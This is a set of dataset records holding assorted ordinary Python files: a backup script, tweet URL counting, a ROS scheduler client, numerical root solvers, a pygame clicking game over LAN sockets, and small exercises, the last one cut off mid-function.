os.path.join(dst, fname)\n newList={}\n for path,folders,files in os.walk(src):\n for file in files:\n file=os.path.join(path,file)\n newList[file]=chmd5(file)\n with open(md5file,'rb') as fobj:\n oldList=pickle.load(fobj)\n\n tar = tarfile.open(fname,'w:gz')\n for key in newList:\n # if key not in oldList or newList[key] != oldList[key]:\n if oldList[key] != newList[key]:\n tar.add(key)\n tar.close()\n\n with open(md5file,'wb') as fobj:\n pickle.dump(newList,fobj)\n\n\ndef manual():\n src='/tmp/demo/security'\n dst='/tmp/demo/backup'\n md5file='/tmp/demo/backup/md5.data'\n\n if time.strftime('%a') != 'Mon':\n total_bak(src,dst,md5file)\n else:\n incr_bak(src,dst,md5file)\n\n\nif __name__ == '__main__':\n manual()\n # with open('/tmp/demo/backup/md5.data','rb') as fobj:\n # data=pickle.load(fobj)\n # print(data)\n","sub_path":"ktz/py02/d3bak.py","file_name":"d3bak.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"514127176","text":"from urllib.parse import urlparse\nfrom fundamentals_of_data_science.case_1.src.main import small_col, full_col\nfrom fundamentals_of_data_science.case_1.src.utils import get_frequency_table\n\n\ndef get_urls_set(collection, case_sensitive=True):\n # return unique user mentions\n urls = collection.distinct('entities.user_mentions.screen_name')\n return mentions if case_sensitive else list(set([m.lower() for m in mentions]))\n\n\ndef get_extended_urls(collection):\n # return unique hash tags\n urls = []\n tweets = collection.find()\n for idx, tw in enumerate(tweets):\n # filter out twitter status\n if idx % 100 == 0:\n print(idx)\n for url in tw['entities']['urls']:\n if not('https://twitter.com' in url['expanded_url']):\n urls.append(url['expanded_url'])\n return urls\n\n\ndef get_domains(extended_urls):\n return [urlparse(u).netloc for u in extended_urls]\n\n\nif __name__ == \"__main__\":\n urls = get_extended_urls(full_col)\n urls_ft = get_frequency_table(urls)\n urls_ft.to_csv(path=\"urls_count.csv\")\n\n if False:\n domains = get_domains(urls)\n domains_ft = get_frequency_table(domains)\n domains_ft.to_csv(path=\"domain_count.csv\")\n print(domains_ft)\n","sub_path":"fundamentals_of_data_science/case_1/src/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"89816802","text":"# Software License Agreement (BSD License)\n#\n# Copyright (C) 2013, Jack O'Quin\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of the author nor of other contributors may be\n# used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n.. module:: requester\n\nPython interface for ROCON services making scheduler requests.\n\nThis module provides a relatively simple API, not requiring detailed\nknowledge of scheduler request messages or state transitions.\n\n.. _`uuid_msgs/UniqueID`:\n http://ros.org/doc/api/uuid_msgs/html/msg/UniqueID.html\n.. _UUID: http://en.wikipedia.org/wiki/Uuid\n\n\"\"\"\n\n# enable some python3 compatibility options:\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport copy\n\n# ROS dependencies\nimport rospy\nimport unique_id\n\n# ROS messages\nfrom scheduler_msgs.msg import Request\nfrom scheduler_msgs.msg import SchedulerRequests\n\n# internal modules\nfrom . import common\nfrom .transitions import RequestSet\nfrom .transitions import ResourceRequest\nfrom .transitions import WrongRequestError\n\n\nclass Requester(object):\n \"\"\"\n This class is used by a ROCON service to handle its resource\n requests. When an instance of :class:`.Requester` is created, it\n creates its own scheduler feedback topic and connects to the ROCON\n scheduler topic.\n\n :param feedback: Callback function invoked with the current\n :class:`.RequestSet` when feedback arrives.\n\n :param uuid: UUID_ of this requester. If ``None`` provided, a random\n UUID will be assigned.\n :type uuid: :class:`uuid.UUID`\n\n :param priority: default priority for requests from this requester.\n\n :param topic: Topic name for allocating resources.\n :type topic: str\n\n :param frequency: requester heartbeat frequency in Hz. Use the\n default, except in exceptional situations or for\n testing.\n :type frequency: float\n\n As long as the :class:`.Requester` object remains, it will\n periodically send request messages to the scheduler, even when no\n requests are outstanding. The scheduler will provide feedback for\n them if anything has changed. The caller-provided *feedback*\n function will be invoked each time a feedback message arrives,\n like this:\n\n .. describe:: feedback(rset)\n\n :param rset: The current set of requests including any updates\n from the scheduler.\n :type rset: :class:`.RequestSet`\n\n The *feedback* function is expected to iterate over its\n :class:`.RequestSet`, checking the status of every\n :class:`.ResourceRequest` it contains, and modify them\n appropriately. If any changes occur, the scheduler will be\n notified after this callback returns.\n\n \"\"\"\n\n def __init__(self, feedback, uuid=None,\n priority=0,\n topic=common.SCHEDULER_TOPIC,\n frequency=common.HEARTBEAT_HZ):\n \"\"\" Constructor. \"\"\"\n\n if uuid is None:\n uuid = unique_id.fromRandom()\n self.requester_id = uuid\n \"\"\" :class:`uuid.UUID` of this requester. \"\"\"\n self.rset = RequestSet([], self.requester_id)\n \"\"\"\n :class:`.RequestSet` containing the current status of every\n :class:`.ResourceRequest` made by this requester. All\n requester operations are done using this object and its\n contents.\n \"\"\"\n self.priority = priority\n \"\"\" Default for new requests' priorities if none specified. \"\"\"\n\n self.feedback = feedback # requester feedback\n self.pub_topic = topic\n self.sub_topic = common.feedback_topic(uuid, topic)\n rospy.loginfo('ROCON requester feedback topic: ' + self.sub_topic)\n self.sub = rospy.Subscriber(self.sub_topic,\n SchedulerRequests,\n self._feedback)\n self.pub = rospy.Publisher(self.pub_topic,\n SchedulerRequests,\n latch=True)\n self.time_delay = rospy.Duration(1.0 / frequency)\n self._set_timer()\n\n def _feedback(self, msg):\n \"\"\" Scheduler feedback message handler. \"\"\"\n new_rset = RequestSet(msg.requests, self.requester_id)\n prev_rset = copy.deepcopy(self.rset)\n self.rset.merge(new_rset)\n\n # invoke user-defined callback function\n self.feedback(self.rset)\n\n if self.rset != prev_rset: # msg or callback changed something?\n self.send_requests() # send new request immediately\n\n def _heartbeat(self, event):\n \"\"\" Scheduler request heartbeat timer handler.\n\n Triggered after nothing has been sent to the scheduler within\n the previous time_delay duration. Sends another copy of the\n current request set to the scheduler.\n\n \"\"\"\n self.send_requests()\n\n def new_request(self, resources, priority=None, uuid=None):\n \"\"\" Add a new scheduler request.\n\n Call this method for each desired new request, then invoke\n :py:meth:`.send_requests` to notify the scheduler.\n\n :param resources: ROCON resources requested\n :type resources: list of scheduler_msgs/Resource\n\n :param priority: Scheduling priority of this request. If\n ``None`` provided, use this requester's priority.\n :type priority: int\n\n :param uuid: UUID_ of this request. If ``None`` provided, a\n random UUID will be assigned.\n :type uuid: :class:`uuid.UUID` or ``None``\n\n :returns: UUID (:class:`uuid.UUID`) assigned.\n :raises: :exc:`.WrongRequestError` if request already exists.\n \"\"\"\n if priority is None:\n priority = self.priority\n if uuid is None:\n uuid = unique_id.fromRandom()\n if uuid in self.rset:\n raise WrongRequestError('UUID already in use.')\n msg = Request(id=unique_id.toMsg(uuid),\n priority=priority,\n resources=resources,\n status=Request.NEW)\n self.rset[uuid] = ResourceRequest(msg)\n return uuid\n\n def send_requests(self):\n \"\"\" Send all current requests to the scheduler.\n\n Use this method after calling :py:meth:`.new_request` one or\n more times. It will send them to the scheduler immediately.\n Otherwise, they would not go out until the next heartbeat\n timer event.\n\n .. note::\n\n A recent heartbeat may already have sent some recent\n requests. This method just ensures they are all sent\n without further delay.\n\n \"\"\"\n #print(str(self.rset))\n self.pub.publish(self.rset.to_msg())\n #self._set_timer() # reset heartbeat timer\n\n def _set_timer(self):\n \"\"\" Schedule heartbeat timer callback. \"\"\"\n if not rospy.is_shutdown():\n #self.timer.shutdown()\n #self.timer = rospy.Timer(self.time_delay,\n # self._heartbeat,\n # oneshot=True)\n self.timer = rospy.Timer(self.time_delay, self._heartbeat)\n","sub_path":"src/rocon_scheduler_requests/requester.py","file_name":"requester.py","file_ext":"py","file_size_in_byte":8535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"239830996","text":"from math import sqrt, log10, pi, ceil, floor\n\ntolerance = 0.0001\n\nh_loss_ideal = 0.08\ndensity = 0.075\nviscosity = 0.0432\nst_length = 100\nroughness = 0.006\ncolebrook_correct = 0.00065\n\n\ndef secant_solver(guess, guess2, func_eval):\n x0 = guess\n x1 = guess2\n steps = 0\n\n for j in range(1, 100):\n if abs(x1 - x0) < tolerance:\n x1 = x1\n print(\"Secant Steps taken: \" + str(steps))\n print(\"Secant Friction Factor: \" + str(x1 + .00065))\n return x1, steps\n\n elif j == 99:\n print(\"Solver Malfunction\")\n return 0\n\n else:\n x2 = x1 - func_eval(x1) * (x1 - x0) / (func_eval(x1) - func_eval(x0))\n x0 = abs(x1)\n x1 = abs(x2)\n steps += 1\n # print(\"x1 is: \" + str(x1))\n # print(\"x0 is: \" + str(x0))\n\n\ndef brents(x0, x1, f):\n fx0 = f(x0)\n fx1 = f(x1)\n max_iter = 50\n\n assert (fx0 * fx1) <= 0, \"Root not bracketed\"\n\n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n fx0, fx1 = fx1, fx0\n\n x2, fx2 = x0, fx0\n\n mflag = True\n steps_taken = 0\n\n while steps_taken < max_iter and abs(x1 - x0) > tolerance:\n fx0 = f(x0)\n fx1 = f(x1)\n fx2 = f(x2)\n\n if fx0 != fx2 and fx1 != fx2:\n L0 = (x0 * fx1 * fx2) / ((fx0 - fx1) * (fx0 - fx2))\n L1 = (x1 * fx0 * fx2) / ((fx1 - fx0) * (fx1 - fx2))\n L2 = (x2 * fx1 * fx0) / ((fx2 - fx0) * (fx2 - fx1))\n new = L0 + L1 + L2\n\n else:\n new = x1 - ((fx1 * (x1 - x0)) / (fx1 - fx0))\n\n if ((new < ((3 * x0 + x1) / 4) or new > x1) or\n (mflag == True and (abs(new - x1)) >= (abs(x1 - x2) / 2)) or\n (mflag == False and (abs(new - x1)) >= (abs(x2 - d) / 2)) or\n (mflag == True and (abs(x1 - x2)) < tolerance) or\n (mflag == False and (abs(x2 - d)) < tolerance)):\n new = (x0 + x1) / 2\n mflag = True\n\n else:\n mflag = False\n\n fnew = f(new)\n d, x2 = x2, x1\n\n if (fx0 * fnew) < 0:\n x1 = new\n else:\n x0 = new\n\n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n\n steps_taken += 1\n print(\"Brent other Steps taken: \" + str(steps_taken))\n print(\"Brent other Friction Factor: \" + str(x1 + .00065))\n return x1, steps_taken\n\n\ndef brent_solver(a, b, func):\n # if func(a) * func(b) >= 0:\n # return 0, 0\n\n if abs(func(a)) < abs(func(b)):\n a, b = b, a\n c = a\n mflag = True\n steps = 0\n\n while steps < 100 and abs(b - a) > tolerance:\n if func(a) != func(c) and func(b) != func(c):\n s1 = (a * func(b) * func(c)) / ((func(a) - func(b)) * (func(a) - func(c)))\n s2 = (b * func(a) * func(c)) / ((func(b) - func(a)) * (func(b) - func(c)))\n s3 = (c * func(a) * func(b)) / ((func(c) - func(a)) * (func(c) - func(b)))\n s = s1 + s2 + s3\n\n else:\n s = b - func(b) * (b - a) / (func(b) - func(a))\n\n if s < (3 * a + b) / 4 or s > b:\n s = (a + b) / 2\n mflag = True\n elif mflag is True and abs(s - b) >= (abs(b - c) / 2):\n s = (a + b) / 2\n mflag = True\n elif mflag is False and abs(s - b) >= (abs(c - d) / 2):\n s = (a + b) / 2\n mflag = True\n elif mflag is True and abs(b - c) < abs(tolerance):\n s = (a + b) / 2\n mflag = True\n elif mflag is False and abs(c - d) < abs(tolerance):\n s = (a + b) / 2\n mflag = True\n else:\n mflag = False\n\n d = c\n c = b\n if func(a) * func(s) < 0:\n b = s\n else:\n a = s\n\n if abs(func(a)) < abs(func(b)):\n a, b = b, a\n\n steps += 1\n print(\"Brent mine Steps taken: \" + str(steps))\n print(\"Brent mine Friction Factor: \" + str(b + .00065))\n return b, steps\n\n\ndef h_loss_func(cfm, dim1, dim2, f):\n eq_dia = 1.3 * pow((dim1 * dim2), 0.625) / pow((dim1 + dim2), 0.25)\n\n eq_area = pi * pow(eq_dia, 2) / 4 / 144\n # print(str(eq_area))\n fpm = cfm / eq_area\n fps = fpm / 60\n\n re = density * fpm * 60 * eq_dia / 12 / viscosity\n\n def colebrook_eq(var):\n lhs = 1 / sqrt(var)\n rhs = -2 * log10((roughness / (3.7 * eq_dia)) + (2.51 / (re * sqrt(var))))\n # print(str(eq_dia))\n return lhs - rhs\n\n h_loss = (f(0.01, 0.04, colebrook_eq)[0] + 0.00065) * (st_length / (eq_dia / 12)) * (\n density / 32.174) * (\n pow(fps, 2) / 2) / 144 * 27.679904842545\n return round(h_loss, 4)\n\n\ndef dim2_func(cfm_seg, limit_inch):\n def dim2_eq(var):\n return h_loss_func(cfm_seg, limit_inch, var) - h_loss_ideal\n\n dim_work, steps = brent_solver(2, 98, dim2_eq)\n print(str(dim_work))\n print(str(steps))\n return dim_work\n\n\n# def func(x):\n# return x-4\n\n\nf = lambda x: x ** 2 - 4\ncfm = int(input(\"CFM: \"))\nwidth = int(input(\"Width: \"))\nheight = int(input(\"Height: \"))\n\n\n# root_brent_other = []\n# root_brent_mine = []\n# root_secant = []\n\n\ndef range_create(n):\n return list(range(100, n + 100))\n\n\ndef numbers(n):\n return [i for i in range(100, n, 100)]\n\n\n# print(numbers(10000))\n\n# cfm = list(range(100, 10000, 100))\n\n\"\"\"for i in range(1, len(cfm)):\n width = 18\n height = 12\n\n root_brent_other.append(h_loss_func(cfm[i], width, height, brents))\n\n root_brent_mine.append(h_loss_func(cfm[i], width, height, brent_solver))\n\n root_secant.append(h_loss_func(cfm[i], width, height, secant_solver))\n # root, steps = brents(func, -10, 10)\n # print(str(brents(f, -10, 10)))\n\nprint(\"Brent other Root is: \" + str(root_brent_other))\nprint(\"Brent mine Root is: \" + str(root_brent_mine))\nprint(\"Secant Root is: \" + str(root_secant))\n# print(\"Steps taken: \" + str(steps))\"\"\"\n\nroot_brent_other = h_loss_func(cfm, width, height, brents)\n\nroot_brent_mine = h_loss_func(cfm, width, height, brent_solver)\n\nroot_secant = h_loss_func(cfm, width, height, secant_solver)\n\nprint(\"Brent other Root is: \" + str(root_brent_other))\nprint(\"Brent mine Root is: \" + str(root_brent_mine))\nprint(\"Secant Root is: \" + str(root_secant))\n","sub_path":"solver_testing.py","file_name":"solver_testing.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"279546377","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport math\n\na1 = np.array([1, 2, 3])\nc = np.array([3, 4, 5])\nX1, Y1, Z1 = a1\nX2, Y2, Z2 = c\nplt.title('show data')\nplt.scatter(X1, Y1, Z1, color=\"blue\", label=\"a1\")\nplt.scatter(X2, Y2, Z2, color=\"red\", label=\"a2\")\ndef Mahalanobis(vec1, vec2):\n npvec1, npvec2 = np.array(vec1), np.array(vec2)\n npvec = np.array([npvec1, npvec2])\n sub = npvec.T[0]-npvec.T[1]\n inv_sub = np.linalg.inv(np.cov(npvec1, npvec2))\n return math.sqrt(np.dot(inv_sub, sub).dot(sub.T))\ndef show_distance(exit_point, c):\n line_point = np.array([exit_point, c])\n x = (line_point.T)[0]\n y = (line_point.T)[1]\n o_dis = round(Mahalanobis(exit_point, c), 2) # 计算距离,更改函数名称\n mi_x, mi_y = (exit_point+c)/2 # 计算中点位置,来显示“distance=xx”这个标签\n plt.annotate('distance=%s' % str(o_dis), xy=(mi_x, mi_y), xycoords='data', xytext=(+10, 0), textcoords='offset points', fontsize=10, arrowprops=dict(arrowstyle=\"-\", connectionstyle=\"arc3,rad=.2\"))\n return plt.plot(x, y, linestyle=\"--\", color='black', lw=1)\nshow_distance(a1, c)\nplt.show()","sub_path":"Test1.py","file_name":"Test1.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"397042046","text":"#!/bin/python\n\nimport sys\n\n\"\"\"INITIAL TRY\ndef getMoneySpent(keyboards, drives, s):\n # Complete this function\n if min(keyboards) > s or min(drives) > s:\n return -1\n total_list = []\n for x in range(0, len(keyboards)):\n for y in range(0, len(drives)):\n price = keyboards[x] + drives[y]\n if price == s:\n # No better combination than spending all the money\n return s\n else:\n total_list.append(price)\n \n if len(total_list) == 0:\n return -1\n else:\n max_price = -1\n for val in total_list:\n if val < s and val > max_price:\n max_price = val\n return max_price\n\"\"\"\n\n# Reading the discussion a better way would be to sort the keyboards in descencing \n# and drives in ascending. Doing that allows us to optimize the for loop and break since we know\n# Values below a certain point cannot be considered. Still brute forced but better optimized\n\ndef getMoneySpent(keyboards, drives, s):\n if min(keyboards) > s or min(drives) > s:\n return -1\n keyboards.sort(reverse=True)\n drives.sort()\n\n total_list = []\n working_max = -1\n\n for k in keyboards:\n for l in drives:\n price = k + l\n if price == s:\n return s\n elif price > s:\n break\n else:\n if price > working_max:\n working_max = price\n return working_max\n\ns,n,m = raw_input().strip().split(' ')\ns,n,m = [int(s),int(n),int(m)]\nkeyboards = map(int, raw_input().strip().split(' '))\ndrives = map(int, raw_input().strip().split(' '))\n# The maximum amount of money she can spend on a keyboard and USB drive, or -1 if she can't purchase both items\nmoneySpent = getMoneySpent(keyboards, drives, s)\nprint(moneySpent)\n","sub_path":"src/python/electronics-shop.py","file_name":"electronics-shop.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"342402822","text":"# A1.3g Kernel Regression\r\ndef kernel(xi,xj, sigma = 0.15):\r\n # this function calculates the kernel of the two x-values xi and xj\r\n return np.exp(-1/(sigma**2)*abs(xi-xj)**2)\r\n\r\n\r\ndef kernel_regression(x_train):\r\n # this function calculates the K-matrix for the kernel regression\r\n n = np.size(x_train)\r\n K = np.zeros((n, n))\r\n for i in xrange(n):\r\n for j in xrange(n):\r\n K[i, j] = kernel(x_train[i], x_train[j])\r\n return K\r\n\r\n\r\ndef kernel_predict(x, X, Y, K):\r\n # this function uses the K-matrix to predict new values\r\n f_x = np.zeros((np.size(x), 1))\r\n for i in xrange(np.size(x)):\r\n k = kernel(x[i],X)\r\n f_x[i,0] = np.dot(np.dot(k.T, inv(K)),Y)\r\n return f_x\r\n\r\n\r\nK = kernel_regression(x_train)\r\n# calculate the predicted values for the training data\r\ny_pred_kernel = kernel_predict(x_plot, x_train, y_train, K)\r\n# calculate the predicted values for the validation data\r\ny_kernel_pred_val = kernel_predict(x_val, x_train, y_train, K)\r\n# calculate the RMSE\r\nkernel_rmse = calc_rmse(Y_val, y_kernel_pred_val)\r\n","sub_path":"h1/solution/src/a13g.py","file_name":"a13g.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"192548574","text":"import pygame,sys,socket,random,time,math,datetime\nimport connection\nfrom tkinter import *\nfrom tkinter import ttk\nfrom pygame.locals import *\n\nMY_SERVER_HOST = '192.168.0.3'\nMY_SERVER_PORT = 8888\nOTHER_HOST = '192.168.0.2'\nOTHER_PORT = 9999\n\nFPS = 60\n\nclass Option: #選單\n \n hovered = False\n \n def __init__(self, text, pos):\n self.text = text\n self.pos = pos\n self.set_rect()\n self.draw()\n \n def draw(self):\n self.set_rend()\n screen.blit(self.rend, self.rect)\n \n def set_rend(self):\n self.rend = menu_font.render(self.text, True, self.get_color())\n \n def get_color(self):\n if self.hovered:\n return (255, 255, 255)\n else:\n return (100, 100, 100)\n \n def set_rect(self):\n self.set_rend()\n self.rect = self.rend.get_rect()\n self.rect.topleft = self.pos\n\nclass Player():\n def __init__(self, pos, count,name):\n self.img = pygame.surface.Surface((50, 50))\n self.rect = self.img.get_rect(center = pos)\n self.count = count #點擊次數\n self.name = name\n\n def click(self, dir):\n if dir == 'count':\n self.count += 1\n \n def draw(self):\n screen.blit(self.img, self.rect)\n \n def make_data_package(self):\n count = str(self.count).rjust(4, '0')\n name = str(self.name)\n return count + name\n\n\nclass Player_1(Player):\n def __init__(self, pos=(960, 360)):\n super().__init__(pos,0,'')\n self.img.fill((255,0,0))\n text = menu_font.render(str(self.count),True,(255,255,255))\n screen.blit(text,self.rect)\n\nclass Player_2(Player):\n def __init__(self, pos=(320, 360)):\n super().__init__(pos,0,'')\n self.img.fill((0,0,255))\n text = menu_font.render(str(self.count),True,(255,255,255))\n screen.blit(text,self.rect)\n\ndef ip_value(ip):\n \"\"\" ip_value returns ip-string as integer \"\"\"\n return int(''.join([x.rjust(3, '0') for x in ip.split('.')]))\n\n\ndef define_players():\n if ip_value(MY_SERVER_HOST) > ip_value(OTHER_HOST):\n me = Player_1()\n enemy = Player_2()\n else:\n me = Player_2()\n enemy = Player_1()\n return me, enemy \n \n\ndef data_transfer():\n me_data = me.make_data_package()\n connection.send(me_data, OTHER_HOST, OTHER_PORT) # the send code\n\n enemy_data = server.receive() # the receive code\n \n enemy.count = int(enemy_data[:4])\n enemy.name = enemy_data[4:]\n\n\ndef update_screen():\n screen.fill((255,255,255))\n enemy.draw()\n me.draw()\n \n pygame.time.wait(50)\n\n\npygame.init()\npygame.mixer.quit() \n\nscreen = pygame.display.set_mode((1280, 720)) #畫面大小\nmenu_font = pygame.font.Font('msjh.ttc', 40) #字體\n\nGame_title = menu_font.render('手 速 遊 戲',True,(255,255,255))\noptions = [Option(\"開始\", (600, 200)), Option(\"排行榜\", (580, 250)),Option(\"離開\", (600, 300))]\n\nwin_text = menu_font.render('WIN!',True,(0,0,0))\n\nme, enemy = define_players()\nserver = connection.Server(MY_SERVER_HOST, MY_SERVER_PORT)\n\nPlaying = False\nMovie_stop = False\nGAME_OVER = False\n\nclock = pygame.time.Clock()\n\nmovie = pygame.movie.Movie('second.mpg')\nmovie_screen = pygame.Surface(movie.get_size()).convert()\nmovie.set_display(movie_screen)\n\ntimer = [0.0]\ndt = 1.0\n\ncost_second = [0.0]\n\nwhile GAME_OVER == False:\n clock.tick(FPS)\n \n for event in pygame.event.get(): \n if event.type == pygame.QUIT: #按下X\n pygame.quit()\n sys.exit()\n \n screen.fill((0, 0, 0)) #黑背景\n\n screen.blit(Game_title,(545,100))\n\n for option in options: \n if option.rect.collidepoint(pygame.mouse.get_pos()): #滑鼠移到字體變色\n option.hovered = True\n else:\n option.hovered = False\n option.draw() #貼上選項\n\n\n if event.type == pygame.MOUSEBUTTONDOWN: #選項滑鼠點擊\n if options[0].rect.collidepoint(pygame.mouse.get_pos()): #按下開始\n\n root=Tk() #GUI\n root.title(\"名字\")\n root.geometry(\"320x240\")\n label=Label(root, text=\"請輸入名字:\")\n entry=Entry(root)\n\n def get_name():\n me.name = entry.get()\n root.destroy()\n \n label.pack()\n entry.pack()\n button=Button(root, text=\"OK\", command=get_name).pack()\n \n root.mainloop()\n \n Playing = True\n \n if options[2].rect.collidepoint(pygame.mouse.get_pos()): #按下離開\n pygame.quit()\n sys.exit()\n \n\n\n if Playing == True:\n \n data_transfer()\n update_screen()\n \n pygame.draw.rect(screen,(0,0,0),(640,0,5,450),0) #中間線\n\n me_name = menu_font.render(str(me.name),True,(0,0,0)) #自己和對方的的名字\n enemy_name = menu_font.render(str(enemy.name),True,(0,0,0))\n\n me_count = menu_font.render(str(me.count),True,(255,255,255)) #自己和對方的點擊次數\n enemy_count = menu_font.render(str(enemy.count),True,(255,255,255))\n \n screen.blit(me_count,me.rect)\n screen.blit(enemy_count,enemy.rect)\n \n screen.blit(me_name,(me.rect.x,me.rect.y - 50))\n screen.blit(enemy_name,(enemy.rect.x,enemy.rect.y - 50))\n\n movie.play()\n screen.blit(movie_screen,(428,180))\n\n\n if not(movie.get_busy()): #影片撥放完\n Movie_stop = True\n \n if Movie_stop == True:\n \n if me.count < 99 and enemy.count < 99: \n timer[0] += dt #計時\n elif me.count == 99 or enemy.count == 99: #自己或對方達到99 停止計時\n \n if me.count == 99: #自己先達到99\n screen.blit(win_text,(me.rect.x,me.rect.y-100))\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n \n pygame.quit()\n sys.exit()\n \n elif enemy.count == 99: #對方先達到99\n screen.blit(win_text,(enemy.rect.x,enemy.rect.y-100))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n \n pygame.quit()\n sys.exit()\n \n \n \n time_string = str(datetime.timedelta(seconds=int(timer[0]))) \n time_blit = menu_font.render(time_string,True,(0,0,0))\n time_blit_size = time_blit.get_size()\n screen.blit(time_blit,(575,500)) #貼上時間\n \n pygame.draw.rect(screen,(255,255,255),(428,180,426,240),0) #影片撥放完畢蓋掉\n pygame.draw.rect(screen,(0,0,0),(640,0,5,450),0)\n \n \n for event in pygame.event.get():\n if event.type == MOUSEBUTTONDOWN: #點到自己的方塊\n x,y = pygame.mouse.get_pos()\n if(x > me.rect.x and x < me.rect.x + 50 and y > me.rect.y and y < me.rect.y + 50 and me.count < 99 and enemy.count != 99): #count上限99\n me.click('count')\n \n if event.type == pygame.QUIT: #按下X\n pygame.quit()\n sys.exit()\n \n \n pygame.display.flip()\n \n\n\n \n","sub_path":"20190109Player2.py","file_name":"20190109Player2.py","file_ext":"py","file_size_in_byte":7818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56468882","text":"#!/usr/bin/python3\n\nimport sys\nimport string\n\n\ndef distinct_questions(list_of_responses):\n questions = set()\n for response in list_of_responses:\n for question in response:\n questions.add(question)\n return len(questions)\n\n\ndef same_questions(list_of_responses):\n questions_common = set(string.ascii_lowercase)\n for respone in list_of_responses:\n questions_per_answer = set()\n for question in respone:\n questions_per_answer.add(question)\n questions_common = questions_common.intersection(questions_per_answer)\n return len(questions_common)\n\n\nif __name__ == '__main__':\n filename = sys.argv[1]\n file = open(filename, 'r')\n question_answered = list()\n sum = 0\n sum2 = 0\n for line in file:\n if len(line.strip()) == 0:\n if len(question_answered) > 0:\n sum += distinct_questions(question_answered)\n sum2 += same_questions(question_answered)\n question_answered = list()\n else:\n question_answered.append(line.strip())\n\n if len(question_answered) > 0:\n sum += distinct_questions(question_answered)\n sum2 += same_questions(question_answered)\n print(\"question_answered:\", sum)\n print(\"same questions:\", sum2)\n\n","sub_path":"src/questions_day6.py","file_name":"questions_day6.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"338829947","text":"import math\r\nimport cmath\r\nimport numpy as np\r\nfrom numpy import linalg as LA\r\nfrom Aux_0 import *\r\nfrom Aux_tile import BuiltTile\r\n\r\nval1 = 0#0 #assign potential value to letter 'a'\r\nval2 = 6*math.sqrt(2)#9 #assign potential value to letter 'b'\r\nval3 = 10*math.sqrt(3)#19 #assign potential value to letter 'c'\r\nval4 = 9*math.pi#29 #assign potential value to letter 'd'\r\n\r\ndef SubDiag(lett): #assign diagonal values to OpMat based on the tiling\r\n return{\r\n 0 : val1,\r\n 1 : val2,\r\n 2 : val3,\r\n 3 : val4\r\n }.get(lett, 0)\r\n\r\ndef Op_Mat_NoPhase(num, patch): #Generates the Schroedinger operator into a square matrix\r\n wid= 2**(num) #wid denotes width of periodic patch\r\n size= wid**2 #size generates the dimension of the operator matrix\r\n NewMat = [[0 for j in range(size)] for i in range(size)]\r\n for i in range(wid):\r\n for j in range(wid):\r\n if i != wid-1:\r\n NewMat[i*wid+j][(i+1)*wid+j] = 1\r\n if j != wid-1:\r\n NewMat[i*wid+j][i*wid+j+1] = 1\r\n if j != 0:\r\n NewMat[i*wid+j][i*wid+j-1] = 1\r\n if i != 0:\r\n NewMat[i*wid+j][(i-1)*wid+j] = 1\r\n NewMat[i * wid + j][i* wid + j] = SubDiag(patch[i][j])\r\n return NewMat\r\n\r\ndef Op_Mat_Phase(num, phase): #Generates the Schroedinger operator into a square matrix\r\n wid= 2**(num) #wid denotes width of periodic patch\r\n size= wid**2 #size generates the dimension of the operator matrix\r\n NewMat = [[0 for j in range(size)] for i in range(size)]\r\n for j in range(wid):\r\n NewMat[0*wid+j][wid*(wid-1)+j] = cmath.exp( phase[1] )\r\n NewMat[(wid-1)*wid+j][0*wid+j] = cmath.exp(- phase[1])\r\n for i in range(wid):\r\n NewMat[i*wid+0][i*wid+ wid-1] = cmath.exp(- phase[0])\r\n NewMat[i*wid+ wid-1][i*wid+0] = cmath.exp( phase[0])\r\n return NewMat\r\n\r\ndef 